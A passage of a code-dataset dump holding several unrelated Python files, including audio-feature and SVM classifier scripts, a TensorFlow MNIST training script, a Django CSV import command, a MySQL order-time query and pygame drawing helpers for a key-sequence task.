469)\n fmstd # (2, 10)\n )\n\n # data = (waveform, spectrogram, rms, zcr, mel_spectrogram, stats)\n return data\n\n\n#### Function to set up the environment\n\ndef setEnviromnent():\n \"\"\"\n Creates the folders for the Generated Dataset\n \"\"\"\n if not os.path.isdir('./GeneratedDataset'):\n os.mkdir('./GeneratedDataset')\n if not os.path.isdir('./GeneratedDataset/train'):\n os.mkdir('./GeneratedDataset/train')\n if not os.path.isdir('./GeneratedDataset/test'):\n os.mkdir('./GeneratedDataset/test')\n\n\ndef setLightEnviromnent():\n \"\"\"\n Creates the folders for the Generated Dataset with a snall number of Data (for test on CPU)\n \"\"\"\n if not os.path.isdir('./GeneratedLightDataset'):\n os.mkdir('./GeneratedLightDataset')\n if not os.path.isdir('./GeneratedLightDataset/train'):\n os.mkdir('./GeneratedLightDataset/train')\n if not os.path.isdir('./GeneratedLightDataset/test'):\n os.mkdir('./GeneratedLightDataset/test')\n\n\ndef createInputParametersFile(template, fileName, dn_parameters):\n \"\"\"\n\n :param template: The template of the dictionnary input_parameters\n :param fileName: The path where we want to save it\n :param dn_parameters: the parameters of the neural network\n\n Creates the file \"fileName\" with the dictionnary input_parameters filled knowing the architecture of the\n Neural Network (known with dn_parameters)\n \"\"\"\n waveform, spectrogram, features, fmstd = getAllInputs('./Dataset/train/audio/0.wav')\n template['spectrum']['nb_channels'], template['spectrum']['h'], template['spectrum']['w'] = spectrogram.shape\n template['audio']['nb_channels'], template['audio']['len'] = waveform.shape\n template['features']['nb_channels'], template['features']['len'] = features.shape\n template['fmstd']['len'] = fmstd.shape[0] * fmstd.shape[1]\n template['final']['len'] = dn_parameters['spectrum']['size_fc'] + dn_parameters['audio']['size_fc'] + \\\n dn_parameters['features']['size_fc'] + dn_parameters['fmstd']['layers_size'][-1]\n\n np.save(fileName, template)\n\n\ndef saveFigures(folder, name, summaryDict):\n \"\"\"\n\n :param folder: the folder where we want to save it\n :param name: the name of the figures\n :param summaryDict: the data of the training we want to plot\n\n Save the plot of the evolution of the training loss and the testing loss through the epochs\n Save the plot of the evolution of the training accuracy and the testing loss accuracy the epochs\n \"\"\"\n loss_train = summaryDict['loss_train']\n loss_test = summaryDict['loss_test']\n acc_train = summaryDict['acc_train']\n acc_test = summaryDict['acc_test']\n nb_epochs = summaryDict['nb_epochs']\n best_epoch = summaryDict['best_model']['epoch']\n best_loss_train = summaryDict['best_model']['loss_train']\n best_acc_train = summaryDict['best_model']['acc_train']\n best_loss_test = summaryDict['best_model']['loss_test']\n best_acc_test = summaryDict['best_model']['acc_test']\n\n min_loss = min(min(loss_train), min(loss_test))\n max_loss = max(max(loss_train), max(loss_test))\n min_acc = min(min(acc_train), min(acc_test))\n max_acc = max(max(acc_train), max(acc_test))\n\n x = np.arange(1, nb_epochs + 1)\n # Save of the loss\n plt.figure()\n plt.plot(x, loss_train, 'steelblue', label='Training Loss')\n plt.plot(x, loss_test, 'darkorange', label='Testing Loss')\n plt.title('Variation of the Loss through the epochs\\n' + name)\n plt.xlabel('Epoch')\n plt.ylabel('Loss value')\n plt.plot([1, nb_epochs], [best_loss_train, best_loss_train], 'steelblue', linestyle='--',\n label='Model training loss : 
{0}'.format(round(best_loss_train, 4)))\n plt.plot([1, nb_epochs], [best_loss_test, best_loss_test], color='darkorange', linestyle='--',\n label='Model testing loss : {0}'.format(round(best_loss_test, 4)))\n plt.plot([best_epoch, best_epoch], [min_loss, max_loss], color='dimgray', linestyle='--',\n label='Best Epoch : {0}'.format(best_epoch))\n plt.legend()\n plt.grid()\n plt.savefig(os.path.join(folder, 'LossFigure_' + name + '.png'))\n\n # Save the accuracy\n plt.figure()\n plt.plot(x, acc_train, 'steelblue', label='Training Accuracy')\n plt.plot(x, acc_test, 'darkorange', label='Testing Accuracy')\n plt.title('Variation of the Accuracy through the epochs\\n' + name)\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy value (%)')\n plt.plot([1, nb_epochs], [best_acc_train, best_acc_train], color='steelblue', linestyle='--',\n label='Model train accuracy : {0}'.format(round(best_acc_train, 2)))\n plt.plot([1, nb_epochs], [best_acc_test, best_acc_test], color='darkorange', linestyle='--',\n label='Model test accuracy : {0}'.format(round(best_acc_test, 2)))\n plt.plot([best_epoch, best_epoch], [min_acc, max_acc], color='dimgray', linestyle='--',\n label='Best Epoch : {0}'.format(best_epoch))\n plt.legend()\n plt.grid()\n plt.savefig(os.path.join(folder, 'AccuracyFigure_' + name + '.png'))\n\n\ndef saveText(folder, name, summaryDict):\n \"\"\"\n\n :param folder: the folder where we want to save it\n :param name: the name of the figures\n :param summaryDict: the data of the training we want to plot\n\n Save a text file which summarize the saved model\n \"\"\"\n loss_train = summaryDict['best_model']['loss_train']\n loss_test = summaryDict['best_model']['loss_test']\n acc_train = summaryDict['best_model']['acc_train']\n acc_test = summaryDict['best_model']['acc_test']\n nb_epochs = summaryDict['nb_epochs']\n best_epoch = summaryDict['best_model']['epoch']\n input_used = summaryDict['inputs_used']\n\n iu_txt = ''\n flag = False\n if input_used[0] == '1':\n iu_txt += 'waveform'\n flag = True\n if input_used[1] == '1':\n if flag:\n iu_txt += ', spectrogram'\n else:\n iu_txt += 'spectrogram'\n flag = True\n if input_used[2] == '1':\n if flag:\n iu_txt += ', features'\n else:\n iu_txt += 'features'\n flag = True\n if input_used[3] == '1':\n if flag:\n iu_txt += ', fmstd'\n else:\n iu_txt += 'fmstd'\n flag = True\n\n text = 'Summary of {5} :\\n\\n' \\\n 'Training Loss : {0}\\n' \\\n 'Testing Loss : {1}\\n' \\\n 'Training Accuracy : {2}\\n' \\\n 'Testing Accuracy : {3}\\n' \\\n 'Train Epochs : {4}\\n' \\\n 'Best Epoch : {8}\\n\\n' \\\n 'Inputs Used : {7}\\t ({6})'\\\n .format(\n loss_train, loss_test, acc_train, acc_test, nb_epochs, name, iu_txt, input_used, best_epoch\n )\n\n with open(os.path.join(folder, 'Summary_' + name + '.txt'), 'a') as f:\n f.write(text)\n\n\n","sub_path":"DataGeneration/inputGeneration.py","file_name":"inputGeneration.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"621509013","text":"# coding=utf-8\nimport unittest\n\nimport easygui\n\nfrom ybckit.gui import init as gui_init\nfrom . 
import ybc_env\n\n\nclass GuiTestCase(unittest.TestCase):\n\n def setUp(self):\n super(GuiTestCase, self).setUp()\n ybc_env.setup()\n gui_init()\n\n def tearDown(self):\n super(GuiTestCase, self).tearDown()\n ybc_env.cleanup()\n\n @unittest.skip('local runs only; the contents of /tmp/request must be checked manually')\n def test_gui(self):\n easygui.buttonbox(msg=\"hello world!\")\n\n self.assertTrue(True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_gui.py","file_name":"test_gui.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"12219076","text":"##knn implementation\n\n\nimport numpy as np\nfrom sklearn import preprocessing, cross_validation, neighbors, svm\nimport pandas as pd\n\ndataset=pd.read_csv('Audio.csv')\n\n# knn handles outliers badly if we don't remove the id column\n\ndataset.drop(['Song Id','Song','name_of_song'],1,inplace=True)\n\nx=np.array(dataset.drop(['final algo'],1))\ny=np.array(dataset['final algo'])\n\n# print(x[0])\n# print(x[:-5])\n#test=pd.read_csv('test.csv')\n\n# knn handles outliers badly if we don't remove the id column\n\n# test.drop(['id','name'],1,inplace=True)\n\n\n# x_test=np.array(test.drop(['class'],1))\n# y_test=np.array(test['class'])\n\n\nx_train,x_test,y_train,y_test=cross_validation.train_test_split(x,y,test_size=0.4)\n\n\n#classifier\nclf=svm.SVC()\nclf.fit(x_train,y_train)\n\n#accuracy measure\naccuracy=clf.score(x_test,y_test)\nprint('accuracy using svm is:')\nprint(accuracy)\n\n\n\n# example_measure=np.array([7.782763354,2903.467941,21.66916186,6330.903385,2788.875991,89.10290948,9.171683311])\n# example_measure=example_measure.reshape(1,-1)\n\n# prediction=clf.predict(example_measure)\n# print(prediction)","sub_path":"scripts/Audio/audio_classifier_svm.py","file_name":"audio_classifier_svm.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"296048668","text":"from machines import Eval\n\n\"\"\" Faithfulness Constraints \"\"\"\n\n\ndef dep():\n dep = Eval()\n dep.set_states({\"dep\"})\n dep.set_alphabet({\"a\", \"b\"})\n dep.set_start(\"dep\")\n dep.add_final(\"dep\")\n dep.add_arc(\"dep\", \"\", \"a\", (1,), \"dep\")\n dep.add_arc(\"dep\", \"\", \"b\", (1,), \"dep\")\n dep.add_arc(\"dep\", \"a\", \"\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"b\", \"\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"a\", \"a\", (0,), \"dep\")\n dep.add_arc(\"dep\", \"b\", \"b\", (0,), \"dep\")\n\n return dep\n\n\ndef max():\n max = Eval()\n max.set_states({\"max\"})\n 
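# MAX penalizes deletion: each (symbol -> \"\") arc below costs 1, while insertions and identity arcs cost 0\n 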
max.set_alphabet({\"a\", \"b\"})\n max.set_start(\"max\")\n max.add_final(\"max\")\n max.add_arc(\"max\", \"\", \"a\", (0,), \"max\")\n max.add_arc(\"max\", \"\", \"b\", (0,), \"max\")\n max.add_arc(\"max\", \"a\", \"\", (1,), \"max\")\n max.add_arc(\"max\", \"b\", \"\", (1,), \"max\")\n max.add_arc(\"max\", \"a\", \"a\", (0,), \"max\")\n max.add_arc(\"max\", \"b\", \"b\", (0,), \"max\")\n\n return max\n\n\n\"\"\" Markedness Constraints \"\"\"\n\n\ndef cc():\n cc = Eval()\n cc.set_states({\"cc0\", \"cc1\"})\n cc.set_alphabet({\"a\", \"b\"})\n cc.set_start(\"cc0\")\n cc.add_final(\"cc0\")\n cc.add_final(\"cc1\")\n cc.add_arc(\"cc0\", \"*\", \"a\", (0,), \"cc0\")\n cc.add_arc(\"cc0\", \"*\", \"b\", (0,), \"cc1\")\n cc.add_arc(\"cc0\", \"*\", \"\", (0,), \"cc0\")\n cc.add_arc(\"cc1\", \"*\", \"b\", (1,), \"cc1\")\n cc.add_arc(\"cc1\", \"*\", \"a\", (0,), \"cc0\")\n cc.add_arc(\"cc1\", \"*\", \"\", (0,), \"cc1\")\n\n return cc\n","sub_path":"constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"113131088","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nfrom sklearn import preprocessing\n\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\n\nTrain_image = mnist.train.images\ny_train = mnist.train.labels\n\nTest_image = mnist.test.images\ny_test = mnist.test.labels\n\nAll_image = np.load('All_image_DR_skewed.npy')\n\nx_max = np.max(All_image)\nx_min = np.min(All_image)\n\nAll_image = (1/16*x_max*(All_image-x_min))/(x_max-x_min)\n\nx_train = All_image[0:55000]\nx_test = All_image[55000:65000]\n\n_, M_train_label = np.where(y_train==1)\n\n_, M_test_label = np.where(y_test==1)\n\n\n# =============================================================================\n# plt.figure()\n# plt.title('Activation')\n# \n# vis_x = x_train[:, 0]\n# vis_y = x_train[:, 1]\n# plt.scatter(vis_x, vis_y, c=M_train_label, marker = '.', cmap=plt.cm.get_cmap(\"jet\", 10))\n# plt.colorbar(ticks=range(10))\n# plt.clim(-0.5, 9.5)\n# plt.show()\n# plt.title('Local Algorithm')\n# \n# plt.figure()\n# plt.title('Activation')\n# \n# vis_x = x_test[:, 0]\n# vis_y = x_test[:, 1]\n# plt.scatter(vis_x, vis_y, c=M_test_label, marker = '.', cmap=plt.cm.get_cmap(\"jet\", 10))\n# plt.colorbar(ticks=range(10))\n# plt.clim(-0.5, 9.5)\n# plt.show()\n# plt.title('Local Algorithm')\n# =============================================================================\n\n\n#%%\ntf.reset_default_graph()\n# Network Parameters\n\n\n\nnum_input = 1 # MNIST data input (img shape: 28*28)\n\nnum_hidden_1 = 1 # 1st layer num features\nnum_hidden_2 = 1 # 2nd layer num features (the latent dim)\nnum_hidden_3 = 1 \n\n\ntwin1_weights = {\n 'h1': tf.Variable(tf.random_normal([num_input, num_hidden_1],mean=0.0, stddev=0.1)),\n 'h2': tf.Variable(tf.random_normal([num_hidden_1, num_hidden_2],mean=0.0, stddev=0.1)),\n 'h3': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h4': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h5': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h_final': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)),\n\n}\n\n\ntwin2_weights = {\n 'h1': tf.Variable(tf.random_normal([num_input, num_hidden_1],mean=0.0, stddev=0.1)),\n 'h2': 
tf.Variable(tf.random_normal([num_hidden_1, num_hidden_2],mean=0.0, stddev=0.1)),\n 'h3': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h4': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h5': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h_final': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)),\n\n}\n\n\n\n# Building the encoder\ndef twin1(x):\n # Encoder Hidden layer with sigmoid activation #1\n layer_1 = tf.matmul(tf.pow(x,2),twin1_weights['h1'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h1']))\n # Encoder Hidden layer with sigmoid activation #2\n layer_2 = tf.matmul(tf.pow(x,2),twin1_weights['h2'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h2'])-layer_1)\n # Decoder Hidden layer with sigmoid activation #1\n layer_3 = tf.matmul(tf.pow(x,2),twin1_weights['h3'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h3'])-layer_2)\n \n layer_4 = tf.matmul(tf.pow(x,2),twin1_weights['h4'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h4'])-layer_3)\n \n# layer_5 = tf.matmul(tf.pow(x,2),twin1_weights['h5'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h5'])-layer_4)\n \n final = twin1_weights['h_final']/(1-layer_4)\n \n return final\n\ndef twin2(x):\n # Encoder Hidden layer with sigmoid activation #1\n layer_1 = tf.matmul(tf.pow(x,2),twin2_weights['h1'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h1']))\n # Encoder Hidden layer with sigmoid activation #2\n layer_2 = tf.matmul(tf.pow(x,2),twin2_weights['h2'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h2'])-layer_1)\n # Decoder Hidden layer with sigmoid activation #1\n layer_3 = tf.matmul(tf.pow(x,2),twin2_weights['h3'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h3'])-layer_2)\n\n layer_4 = tf.matmul(tf.pow(x,2),twin2_weights['h4'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h4'])-layer_3)\n\n# layer_5 = tf.matmul(tf.pow(x,2),twin2_weights['h5'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h5'])-layer_4)\n \n final = twin2_weights['h_final']*x/(1-layer_4)\n \n return final\n\n\n\n# Training Parameters\nlearning_rate = 0.002\nnum_steps = 10000\n\n\n\n# Construct model\nX = tf.placeholder(tf.float32, shape = (None, 2))\ny = tf.placeholder(tf.float32, shape = (None, 10))\n \n\nencoder_1 = twin1(X[:,0:1])\nencoder_2 = twin2(X[:,1:2])\n\nfeature = tf.concat([encoder_1, encoder_2], axis = 1)\n\n#feature = X\n\n\nFC1_weights = tf.get_variable('W1', dtype=tf.float32, shape=[2,300], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC1_biases = tf.get_variable('b1', dtype=tf.float32, shape = [300], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\nFC2_weights = tf.get_variable('W2', dtype=tf.float32, shape=[300,200], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC2_biases = tf.get_variable('b2', dtype=tf.float32, shape = [200], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\nFC3_weights = tf.get_variable('W3', dtype=tf.float32, shape=[200,10], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC3_biases = tf.get_variable('b3', dtype=tf.float32, shape = [10], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\n\nFC_layer1 = tf.nn.relu(tf.matmul(feature, FC1_weights) + FC1_biases)\n\nFC_layer2 = tf.nn.relu(tf.matmul(FC_layer1, FC2_weights) + FC2_biases)\n\noutput_logits = tf.matmul(FC_layer2, FC3_weights) + FC3_biases\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output_logits), name='loss')\noptimizer = tf.train.AdamOptimizer(learning_rate = 
0.002, name='Adam-op').minimize(loss)\ncorrect_prediction = tf.equal(tf.argmax(output_logits, 1), tf.argmax(y, 1), name='correct_pred')\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')\n\n# Model predictions\ncls_prediction = tf.argmax(output_logits, axis=1, name='predictions')\n\ninit = tf. global_variables_initializer()\nbatch_size = 1000\nepochs = 100\ntrain_accuracy = np.zeros((1,epochs))\n# Create an interactive session (to keep the session in the other cells)\nsess = tf.InteractiveSession()\n# Initialize all variables\nsess.run(init)\n# Number of training iterations in each epoch\nnum_tr_iter = int(len(y_train) / batch_size)\nfor epoch in range(epochs):\n print('Training epoch: {}'.format(epoch + 1))\n # Randomly shuffle the training data at the beginning of each epoch \n\n index = [i for i in range(55000)] \n np.random.shuffle(index) \n x_train = x_train[index]\n y_train = y_train[index]\n \n\n \n for iteration in range(num_tr_iter):\n\n\n x_batch = x_train[batch_size*iteration:batch_size*(iteration+1)]\n y_batch = y_train[batch_size*iteration:batch_size*(iteration+1)] \n # Run optimization op (backprop)\n\n sess.run(optimizer, feed_dict={X: x_batch, y: y_batch})\n\n if iteration % 2 == 0:\n # Calculate and display the batch loss and accuracy\n loss_batch, acc_batch = sess.run([loss, accuracy],\n feed_dict={X: x_batch, y: y_batch})\n\n print(\"iter {0:3d}:\\t Loss={1:.2f},\\tTraining Accuracy={2:.01%}\".\n format(iteration, loss_batch, acc_batch))\n \n train_accuracy[0,epoch] = sess.run(accuracy, feed_dict = {X: x_train, y: y_train})\n print(train_accuracy[0,epoch])\n \n \n \n\nprint(sess.run(accuracy, feed_dict = {X: x_test, y: y_test}))\n\n\n\n#%%\nplt.figure()\nplt.plot(np.arange(epochs), train_accuracy[0,:])\n\n","sub_path":"Robustness/MNIST_QuadraticTrain_deep.py","file_name":"MNIST_QuadraticTrain_deep.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"583588000","text":"\"\"\"Import voting statements from a CSV file.\"\"\"\n\nimport csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils.text import slugify\n\nfrom ...models import Statement\n\n\nclass Command(BaseCommand):\n \"\"\"Import voting statements from a CSV file.\"\"\"\n help = \"Import voting statements from a CSV file.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"filename\")\n\n def handle(self, *args, **options):\n imported = 0\n with open(options[\"filename\"], encoding=\"ascii\",\n newline=\"\") as csvfile:\n for row in csv.reader(csvfile):\n title, release_date, msgid = row[1:]\n release_date = datetime.datetime.strptime(\n release_date, \"%Y-%m-%d\").date()\n if Statement.objects.filter(\n release_date=release_date, title=title):\n continue\n Statement(\n title=title,\n slug=slugify(title),\n release_date=release_date,\n msgid=msgid,\n statement=\"\",\n ).save()\n imported += 1\n self.stdout.write(self.style.SUCCESS(\n \"Imported {} statement(s)\".format(imported)\n ))\n","sub_path":"voting/management/commands/importvotingstatements.py","file_name":"importvotingstatements.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350669002","text":"import pymysql.cursors\n\n# 连接数据库\nconnect = pymysql.Connect(\n host='localhost',\n port=3310,\n user='root',\n passwd='root',\n db='supershop',\n charset='utf8'\n)\n\n# 获取游标\ncursor = 
connect.cursor()\n\n# query the data\nsql = \"\"\"\nSELECT time,COUNT(time) count FROM\n(SELECT SUBSTRING(startDate,12,2) time FROM `sp_order` AS o) AS t\nGROUP BY time\nORDER BY count desc;\n\"\"\"\n# data = ('13512345678',)\ncursor.execute(sql)\nfor row in cursor.fetchall():\n # each row is (hour of day, order count)\n print(\"Hour:%s\\tOrders:%d\" % row)\nprint('Found', cursor.rowcount, 'rows in total')\n\n# close the connection\ncursor.close()\nconnect.close()\n","sub_path":"sellHotTime.py","file_name":"sellHotTime.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475966301","text":"import pygame\nfrom pygame.gfxdraw import aacircle\nfrom pygame.draw import polygon\nimport numpy as np\n\ndef draw_filled_aacircle(screen, radius, color, xpos, ypos):\n pygame.gfxdraw.filled_circle(screen,\n int(xpos),\n int(ypos),\n int(radius),\n color)\n pygame.gfxdraw.aacircle(screen,\n int(xpos),\n int(ypos),\n int(radius),\n color)\n\ndef draw_center_rect(screen, width, height, color, xpos, ypos):\n rect = pygame.Rect(xpos-0.5*width,\n ypos-0.5*height,\n width,\n height)\n pygame.draw.rect(screen, color, rect) \n\ndef draw_bottom_rect(screen, width, height, color, xpos, ypos):\n rect = pygame.Rect(xpos-0.5*width,\n ypos,\n width,\n height)\n rect.bottom = ypos\n pygame.draw.rect(screen, color, rect) \n\n\ndef draw_msg(screen, text, color=(255,255,255),\n loc='center', pos=(1024/2,768/2), size=50,\n font='freesansbold.ttf'):\n font = pygame.font.Font(font, size)\n text_surf, text_rect = make_text(text, font, color)\n if loc == 'center':\n text_rect.center = pos\n elif loc == 'left':\n text_rect.center = pos\n text_rect.left = pos[0]\n elif loc == 'right':\n text_rect.center = pos\n text_rect.right = pos[0]\n screen.blit(text_surf, text_rect)\n\ndef make_text(text, font, color):\n text_surface = font.render(text, True, color)\n return text_surface, text_surface.get_rect()\n\ndef draw_info_rect(screen, text, text_color,\n bg_color, border_color,\n width, height, xpos, ypos,\n padding_size=4, border_size=4):\n PADDING_SIZE = padding_size\n BORDER_SIZE = border_size\n BORDER_SIZE = PADDING_SIZE + BORDER_SIZE\n # draw border\n draw_center_rect(screen, width+BORDER_SIZE,\n height+BORDER_SIZE, border_color,\n xpos, ypos)\n # draw background\n draw_center_rect(screen, width+PADDING_SIZE,\n height+PADDING_SIZE, bg_color,\n xpos, ypos)\n # draw message\n draw_msg(screen, text, text_color,\n pos=(xpos-0.5*width+PADDING_SIZE,ypos),\n size=height, loc='left')\n\ndef draw_fixation(game, xpos, color=(255,255,255)):\n draw_msg(game.screen, '+', color=color,\n loc='center',\n pos=(xpos,\n .5*game.SCREEN_HEIGHT+game.FIXATION_OFFSET),\n size=130)\n\ndef draw_keyboard(game):\n for key in range(5):\n if game.keydown[key]:\n color = game.ACTIVE_COLOR\n else:\n color = game.PASSIVE_COLOR\n draw_center_rect(game.screen,\n game.KEY_WIDTH,\n game.KEY_HEIGHT,\n color,\n .5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n game.KEY_YPOS)\n if (game.current_key != 'none'\n and game.current_key != game.last_key):\n draw_filled_aacircle(game.screen, .5*game.KEY_WIDTH,\n game.ACTIVE_COLOR,\n .5*game.SCREEN_WIDTH+game.KEY_XPOS*(game.current_key-3),\n .5*game.KEY_YPOS)\n game.potential_last_key = game.current_key\n else:\n game.last_key = game.potential_last_key\n\ndef draw_cue(game):\n for key in range(len(game.current_sequence)):\n draw_msg(game.screen, str(game.current_sequence[key]),\n color=(255,255,255),\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n 
.5*game.SCREEN_HEIGHT+game.NUMBER_OFFSET),\n size=125)\n\ndef draw_sequence_progress(game):\n draw_fixation(game, xpos=.5*game.SCREEN_WIDTH, color=game.FIXATION_COLOR)\n # star for each press\n # goes green if correct, red if wrong, grey otherwise\n for key in range(len(game.current_sequence)):\n if game.sequence_progress[key] == 'unpressed':\n color = game.PASSIVE_COLOR\n elif game.sequence_progress[key] == 'correct':\n color = game.ACTIVE_COLOR\n elif game.sequence_progress[key] == 'wrong':\n color = game.WRONG_COLOR\n else:\n color = (0,0,0) # silly base case\n # check draw_keyboard for specific positionings\n draw_msg(game.screen, '*', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n .5*game.SCREEN_HEIGHT+game.STAR_OFFSET-game.SEQUENCE_PROGRESS_OFFSET),\n size=150)\n\ndef draw_frame_rectangle(game):\n draw_center_rect(game.screen,\n width=.5*game.KEY_WIDTH+5*game.KEY_XPOS+2*game.FRAME_RECT_BORDER_WIDTH,\n height=game.FRAME_HEIGHT+2*game.FRAME_RECT_BORDER_WIDTH,\n color=game.PASSIVE_COLOR,\n xpos=.5*game.SCREEN_WIDTH,\n ypos=.5*game.SCREEN_HEIGHT)\n draw_center_rect(game.screen,\n width=.5*game.KEY_WIDTH+5*game.KEY_XPOS,\n height=game.FRAME_HEIGHT,\n color=game.BG_COLOR,\n xpos=.5*game.SCREEN_WIDTH,\n ypos=.5*game.SCREEN_HEIGHT)\n\ndef draw_tutorial_messages(game, shade, stage):\n text_shade = min(255,int(255-(255-game.BG_COLOR[0])*shade))\n msg_height = .05*game.SCREEN_HEIGHT\n for msg in range(len(game.TUTORIAL_MESSAGES[stage])):\n draw_msg(game.screen, game.TUTORIAL_MESSAGES[stage][msg],\n color=(text_shade,text_shade,text_shade),\n loc='center', pos=(.5*game.SCREEN_WIDTH,.7*game.SCREEN_HEIGHT+msg*msg_height), size=24,\n font='freesansbold.ttf')\n\ndef draw_tutorial_keyboard(game, xpos, ypos, scale):\n for key in range(5):\n if game.keydown[key]:\n color = game.ACTIVE_COLOR\n game.tutorial_each_key[key] = True\n else:\n color = game.PASSIVE_COLOR\n draw_center_rect(game.screen,\n scale*game.KEY_WIDTH,\n scale*game.KEY_HEIGHT,\n color,\n .5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n game.KEY_YPOS+ypos)\n if not(game.tutorial_each_key[key]):\n color = game.PASSIVE_COLOR\n else:\n color = (255,255,255)\n draw_msg(game.screen, str(key+1),\n color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n (.25+.26*(1-scale))*game.SCREEN_HEIGHT+ypos),\n size=int(scale*125))\n\ndef draw_tutorial_rect(game, shade, xpos, ypos, scale):\n rect_shade = min(game.PASSIVE_COLOR[0],int(game.PASSIVE_COLOR[0]-(game.PASSIVE_COLOR[0]-game.BG_COLOR[0])*shade))\n draw_center_rect(game.screen,\n width=scale*(.5*game.KEY_WIDTH+5*game.KEY_XPOS+2*game.FRAME_RECT_BORDER_WIDTH),\n height=scale*(game.FRAME_HEIGHT+2*game.FRAME_RECT_BORDER_WIDTH),\n color=(rect_shade,rect_shade,rect_shade),\n xpos=.5*game.SCREEN_WIDTH+xpos,\n ypos=.5*game.SCREEN_HEIGHT+ypos)\n draw_center_rect(game.screen,\n width=scale*(.5*game.KEY_WIDTH+5*game.KEY_XPOS),\n height=scale*(game.FRAME_HEIGHT),\n color=game.BG_COLOR,\n xpos=.5*game.SCREEN_WIDTH+xpos,\n ypos=.5*game.SCREEN_HEIGHT+ypos)\n\ndef draw_tutorial_cue(game, shade, xpos, ypos, scale): \n draw_tutorial_rect(game, shade, xpos, ypos, scale)\n text_shade = min(255,int(255-(255-game.BG_COLOR[0])*shade))\n for key in range(len(game.current_sequence)):\n draw_msg(game.screen, str(game.current_sequence[key]),\n color=(text_shade,text_shade,text_shade),\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n .5*game.SCREEN_HEIGHT+ypos),\n size=int(scale*125))\n\ndef 
draw_tutorial_sequence_progress(game, shade):\n fixation_shade = min(game.FIXATION_COLOR[0],int(game.FIXATION_COLOR[0]-(game.FIXATION_COLOR[0]-game.BG_COLOR[0])*shade))\n draw_fixation(game, xpos=.5*game.SCREEN_WIDTH, color=(fixation_shade,fixation_shade,fixation_shade))\n for key in range(len(game.current_sequence)):\n if shade > 0:\n cue_shade = min(game.PASSIVE_COLOR[0],int(game.PASSIVE_COLOR[0]-(game.PASSIVE_COLOR[0]-game.BG_COLOR[0])*shade))\n color = (cue_shade,cue_shade,cue_shade)\n elif game.sequence_progress[key] == 'unpressed':\n color = game.PASSIVE_COLOR\n elif game.sequence_progress[key] == 'correct':\n color = game.ACTIVE_COLOR\n elif game.sequence_progress[key] == 'wrong':\n color = game.WRONG_COLOR\n else:\n color = (0,0,0) # silly base case\n draw_msg(game.screen, '*', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n .5*game.SCREEN_HEIGHT+game.STAR_OFFSET-game.SEQUENCE_PROGRESS_OFFSET),\n size=150)\n\ndef draw_tutorial_sequence_score(game, shade, condition, scale, ypos, points_bool=False):\n draw_tutorial_rect(game, shade, 0, ypos, scale)\n if condition == 'fast':\n base_color = 